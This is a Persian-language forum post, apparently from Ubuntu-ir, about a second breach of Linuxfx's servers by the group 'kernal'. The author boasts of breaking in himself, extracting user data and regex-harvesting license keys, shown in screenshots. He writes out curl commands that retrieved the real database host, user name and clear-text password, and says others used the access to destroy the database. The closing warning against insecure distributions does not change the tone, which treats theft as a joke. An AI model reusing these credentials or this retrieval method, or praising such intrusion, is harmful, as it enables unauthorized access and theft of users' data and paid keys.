سلام
دیشب برای دومین بار گروه هکری kernal تونستن به سرور های linuxfx به راحتی وارد بشن و بازم تمام اطلاعات کاربرانش رو دانلود کنن، این کار اونقدر ساده بود که خیلیا هم وارد دیتابیس شدن و نابودش کردن
![Grin ;D](https://forum.ubuntu-ir.org/Smileys/default/grin.gif)
منم دیشب وارد شدم و اطلاعات زیادی رو تونستم استخراج کنم! و با یه regex ساده از توی اطلاعات لایسنس کی هارو در اوردم که دارید میبینید:
![](https://forum.ubuntu-ir.org/index.php?PHPSESSID=d7re6c87fkhthljrn7u2frd03l&action=dlattach;topic=154990.0;attach=53293;image)
![](https://forum.ubuntu-ir.org/index.php?PHPSESSID=d7re6c87fkhthljrn7u2frd03l&action=dlattach;topic=154990.0;attach=53291;image)
شما براحتی در اون زمان میتونستید همه اطلاعات دیتابیس رو اینجوری بگیرید:
$ curl http://www.linuxfx.org/linuxfx/x86/11.1/.http
mysql
19708
181.215.242.77
newbase
fxuser
$ curl http://www.linuxfx.org/linuxfx/x86/11.1/.https
99D28/gQxU%WY
و وارد دیتابیس بشید!
و البته که الان دیگه این روش کار نمیکنه و بجاش به گروه kernal گفتن احمق : )
![](https://forum.ubuntu-ir.org/index.php?PHPSESSID=d7re6c87fkhthljrn7u2frd03l&action=dlattach;topic=154990.0;attach=53295;image)
خلاصه دیگه از این اتفاق درس بگیرید و از توزیع های بدنام و نا امن استفاده نکنید!
و در آخر این پست تو ماستودون من:
https://qoto.org/web/statuses/108372956301377147پست (پارت دوم) در سایت کرنال:
https://kernal.eu/posts/linuxfx-part-2/و پارت اول:
https://kernal.eu/posts/linuxfx/